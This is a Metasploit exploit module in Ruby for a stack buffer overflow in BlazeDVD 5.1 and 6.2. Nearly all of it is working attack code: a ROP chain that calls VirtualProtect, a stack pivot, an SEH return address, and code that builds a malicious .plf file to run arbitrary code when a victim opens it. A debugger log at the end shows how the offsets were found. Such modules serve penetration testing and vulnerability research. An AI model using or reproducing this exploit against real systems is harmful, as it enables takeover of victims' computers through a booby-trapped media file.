## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow', 'Description' => %q{ This module exploits a stack over flow in BlazeDVD 5.1 and 6.2. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', # Developed target 5.1 'Deepak Rathore', # ExploitDB PoC 'Spencer McIntyre', # Developed taget 6.2 'Ken Smith' # Developed target 6.2 ], 'References' => [ [ 'CVE' , '2006-6199' ], [ 'EDB', '32737' ], [ 'OSVDB', '30770' ], [ 'BID', '35918' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'AllowWin32SEH' => true }, 'Payload' => { 'Space' => 750, 'BadChars' => "\x00\x0a\x1a", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'BlazeDVD 6.2', { 'Payload' => { # Stackpivot => add esp,0xfffff254 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" } } ], [ 'BlazeDVD 5.1', { 'Ret' => 0x100101e7, 'Payload' => { 'EncoderType' => Msf::Encoder::Type::AlphanumUpper } } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 03 2009', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']), ], self.class) end def rop_chain # rop chain generated with mona.py - www.corelan.be case target.name when 'BlazeDVD 6.2' rop_gadgets = [ ] # 0x6162e802 RETN (ROP NOP) [EPG.dll] rop_gadgets.fill(0x6162e802, 0..7) rop_gadgets += [ 0x61636758, # POP EAX # RETN [EPG.dll] 0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll] 0x616306ed, # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] 0x616385d8, # XCHG EAX,ESI # RETN 0x00 [EPG.dll] 0x61628ea2, # POP EBP # RETN [EPG.dll] 0x616069a1, # push esp # ret 0x04 [EPG.dll] 0x61626702, # POP EAX # RETN [EPG.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x61627d9c, # NEG EAX # RETN [EPG.dll] 0x61640124, # XCHG EAX,EBX # RETN [EPG.dll] 0x61629938, # POP EAX # RETN [EPG.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x61627d9c, # NEG EAX # RETN [EPG.dll] 0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll] 0x61612f5a, # POP ECX # RETN [EPG.dll] 0x100142ab, # &Writable location [SkinScrollBar.Dll] 0x616313ac, # POP EDI # RETN [EPG.dll] 0x6162e588, # RETN (ROP NOP) [EPG.dll] 0x6162d638, # POP EAX # RETN [EPG.dll] 0x90909090, # nop 0x61620831, # PUSHAD # RETN [EPG.dll] ] end return rop_gadgets.flatten.pack("V*") end def exploit case target.name when 'BlazeDVD 5.1' plf = rand_text_alpha_upper(6024) plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') plf[876,12] = make_nops(12) plf[888,payload.encoded.length] = payload.encoded when 'BlazeDVD 6.2' plf = rand_text_alphanumeric(260) plf << rop_chain plf << payload.encoded end print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(plf) end end =begin 0:000> !exchain 0012f2c8: 31644230 Invalid exception stack at 64423963 0:000> !pattern_offset 6024 0x31644230 [Byakugan] Control of 0x31644230 at offset 872. 0:000> !pattern_offset 6024 0x64423963 [Byakugan] Control of 0x64423963 at offset 868. 0:000> s -b 0x10000000 0x10018000 5e 59 c3 100012cd 5e 59 c3 56 8b 74 24 08-57 8b f9 56 e8 a2 3c 00 ^Y.V.t$.W..V..<. 100101e7 5e 59 c3 90 90 90 90 90-90 8b 44 24 08 8b 4c 24 ^Y........D$..L$ 0:000> u 0x100012cd L3 skinscrollbar!SkinSB_ParentWndProc+0x1fd: 100012cd 5e pop esi 100012ce 59 pop ecx 100012cf c3 ret =end